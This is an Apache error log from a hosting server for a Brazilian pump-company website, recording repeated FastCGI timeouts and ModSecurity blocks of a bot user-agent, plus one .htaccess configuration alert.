[Mon Mar 16 22:43:12.092580 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44504] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:43:34.129862 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44886] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:43:50.416160 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.228.16:44300] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abix1gQohV2v-7oj5HHBMQAAAYs"]
[Mon Mar 16 22:43:55.129811 2026] [proxy_fcgi:error] [pid 2473:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45252] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:44:16.129861 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45630] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:44:21.903358 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.244.31:33602] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abix9QQohV2v-7oj5HHBRgAAAYs"]
[Mon Mar 16 22:44:37.109582 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45968] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:44:58.069832 2026] [proxy_fcgi:error] [pid 4740:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46388] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:45:24.121772 2026] [proxy_fcgi:error] [pid 2304:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46824] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:45:45.130150 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47192] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:46:07.125774 2026] [proxy_fcgi:error] [pid 2304:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47624] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:46:29.145874 2026] [proxy_fcgi:error] [pid 2325:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48882] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:46:51.125800 2026] [proxy_fcgi:error] [pid 2304:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49476] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:47:12.129805 2026] [proxy_fcgi:error] [pid 11469:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:49872] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:47:33.077927 2026] [proxy_fcgi:error] [pid 4740:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50202] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:47:55.102311 2026] [proxy_fcgi:error] [pid 11293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50612] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:48:17.127427 2026] [proxy_fcgi:error] [pid 2304:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50926] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:48:39.169953 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51300] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:49:01.130475 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51652] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:49:11.983483 2026] [:error] [pid 4740:tid 140411565680384] [client 74.7.228.16:51450] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abizFwfYLcKp6Sb5AeL6JQAAAFU"]
[Mon Mar 16 22:49:23.122042 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52018] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:49:44.129779 2026] [proxy_fcgi:error] [pid 2304:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52388] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:50:05.149834 2026] [proxy_fcgi:error] [pid 11293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52772] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:50:26.149778 2026] [proxy_fcgi:error] [pid 2325:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53136] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:50:26.305610 2026] [:error] [pid 2304:tid 140411708356352] [client 74.7.244.31:38852] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abizYsh3JZxwdBQwPYG3yAAAAIQ"]
[Mon Mar 16 22:50:29.817436 2026] [mime_magic:error] [pid 2304:tid 140411725141760] (70014)End of file found: [client 66.249.74.169:65001] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 22:50:48.121938 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53534] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:51:10.161778 2026] [proxy_fcgi:error] [pid 2305:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:53932] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:51:33.110305 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54358] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:51:55.121828 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54728] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:52:16.121776 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55118] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:52:37.130121 2026] [proxy_fcgi:error] [pid 11469:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55540] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:52:59.045897 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55820] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:53:22.137900 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56196] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:53:44.123726 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56596] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:54:05.041995 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:54:12.504224 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.228.16:41282] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi0RJDEJR9VXonE_-0MQAAAAQ4"]
[Mon Mar 16 22:54:28.133987 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:54:50.045807 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57880] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:55:11.373779 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58230] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:55:33.132868 2026] [proxy_fcgi:error] [pid 2325:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58552] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:55:55.045855 2026] [proxy_fcgi:error] [pid 4740:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58920] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:56:16.053888 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59326] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:56:38.129325 2026] [proxy_fcgi:error] [pid 11293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59700] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:57:01.129845 2026] [proxy_fcgi:error] [pid 2305:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60024] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:57:22.065887 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60332] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:57:43.057812 2026] [proxy_fcgi:error] [pid 11293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60744] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:58:05.114518 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:32864] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:58:26.129804 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33220] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:58:48.057845 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33654] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:59:09.125805 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33984] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:59:31.089841 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34328] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:59:36.397670 2026] [:error] [pid 2304:tid 140411557287680] [client 74.7.228.16:35514] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi1iMh3JZxwdBQwPYG4mwAAAJY"]
[Mon Mar 16 22:59:54.129815 2026] [proxy_fcgi:error] [pid 11293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34706] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:00:16.102268 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35030] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:00:38.041906 2026] [proxy_fcgi:error] [pid 2325:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35216] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:00:45.110581 2026] [:error] [pid 2305:tid 140411674785536] [client 74.7.244.31:39252] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi1zQQohV2v-7oj5HHDVAAAAYg"]
[Mon Mar 16 23:00:59.125768 2026] [proxy_fcgi:error] [pid 11293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35458] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:01:21.041896 2026] [proxy_fcgi:error] [pid 2325:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:35690] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:01:43.102364 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35928] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:02:05.125819 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36126] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:02:27.118471 2026] [proxy_fcgi:error] [pid 2304:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36358] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:02:49.121902 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36496] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:03:11.125861 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36646] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:03:32.206603 2026] [proxy_fcgi:error] [pid 2305:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36842] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:03:55.025916 2026] [proxy_fcgi:error] [pid 2473:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37060] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:04:18.133832 2026] [proxy_fcgi:error] [pid 2473:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37176] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:04:39.145808 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37326] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:04:41.043884 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.228.16:52002] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi2udCmCSWTlPouqoqNBgAAANE"]
[Mon Mar 16 23:05:00.157790 2026] [proxy_fcgi:error] [pid 2304:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37470] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:05:23.093827 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37620] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:05:45.130170 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37760] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:06:06.141900 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37950] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:06:08.340972 2026] [:error] [pid 2304:tid 140411599251200] [client 74.7.244.31:48002] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi3EMh3JZxwdBQwPYG5KwAAAJE"]
[Mon Mar 16 23:06:28.129833 2026] [proxy_fcgi:error] [pid 4740:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38168] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:06:49.131644 2026] [proxy_fcgi:error] [pid 4740:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38318] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:07:11.130604 2026] [proxy_fcgi:error] [pid 2325:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38506] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:07:33.123054 2026] [proxy_fcgi:error] [pid 2304:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38710] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:07:54.126051 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:38978] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:08:16.126004 2026] [proxy_fcgi:error] [pid 4740:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39236] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:08:37.127453 2026] [proxy_fcgi:error] [pid 11469:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39440] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:08:58.126777 2026] [proxy_fcgi:error] [pid 4740:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39598] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:09:20.130361 2026] [proxy_fcgi:error] [pid 2305:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39816] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:09:43.064683 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40032] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:10:06.621814 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40230] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:10:08.218801 2026] [:error] [pid 11469:tid 140411624429312] [client 74.7.228.16:50634] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi4AJDEJR9VXonE_-0NogAAAQ4"]
[Mon Mar 16 23:10:28.141944 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40438] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:10:49.125823 2026] [proxy_fcgi:error] [pid 2305:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40660] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:11:11.117813 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40882] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:11:27.749424 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.244.31:42250] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi4T6BJNF7axNlVR0XDYwAAABY"]
[Mon Mar 16 23:11:32.129795 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41102] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:11:54.049813 2026] [proxy_fcgi:error] [pid 11293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41384] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:12:16.126646 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41596] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:12:37.125783 2026] [proxy_fcgi:error] [pid 4740:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41772] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:12:59.128680 2026] [proxy_fcgi:error] [pid 2325:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42020] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:13:21.117801 2026] [proxy_fcgi:error] [pid 2305:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42192] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:13:35.005023 2026] [core:alert] [pid 2305:tid 140411658000128] [client 66.249.74.160:35603] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Mon Mar 16 23:13:42.033829 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42376] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:14:03.057973 2026] [proxy_fcgi:error] [pid 2304:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42532] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:14:24.131431 2026] [proxy_fcgi:error] [pid 2325:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42664] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:14:46.134011 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42912] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:15:08.150790 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43160] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:15:19.217324 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.228.16:50298] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi5N9CmCSWTlPouqoqOegAAANM"]
[Mon Mar 16 23:15:30.127275 2026] [proxy_fcgi:error] [pid 2305:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43414] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:15:52.033967 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43608] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:16:13.141783 2026] [proxy_fcgi:error] [pid 2305:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43784] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:16:35.116670 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.244.31:58576] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi5g6BJNF7axNlVR0XECgAAAAQ"]
[Mon Mar 16 23:16:36.123313 2026] [proxy_fcgi:error] [pid 11469:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43954] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:16:58.139055 2026] [proxy_fcgi:error] [pid 4740:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44126] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:17:20.133783 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:44402] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:17:42.137787 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44800] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:18:03.053829 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45248] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:18:25.121942 2026] [proxy_fcgi:error] [pid 11469:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45484] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:18:46.054200 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45722] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:19:08.129817 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45974] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:19:30.121861 2026] [proxy_fcgi:error] [pid 11469:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46146] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:19:52.132207 2026] [proxy_fcgi:error] [pid 2473:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46386] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:20:13.121816 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46630] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:20:35.131809 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46846] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:20:41.490129 2026] [:error] [pid 2304:tid 140411716749056] [client 74.7.228.16:46484] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi6ech3JZxwdBQwPYG6-gAAAIM"]
[Mon Mar 16 23:20:57.125870 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47010] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:21:18.133997 2026] [proxy_fcgi:error] [pid 11469:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47218] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:21:39.033841 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47466] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:21:55.627450 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.244.31:58282] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi6w-82sZHvlq4xgHqJlQAAAo0"]
[Mon Mar 16 23:22:00.041812 2026] [proxy_fcgi:error] [pid 11293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47598] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:22:22.133400 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47788] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:22:43.121859 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47980] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:23:05.137788 2026] [proxy_fcgi:error] [pid 2304:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48146] AH01075: Error dispatching request to : (polling)
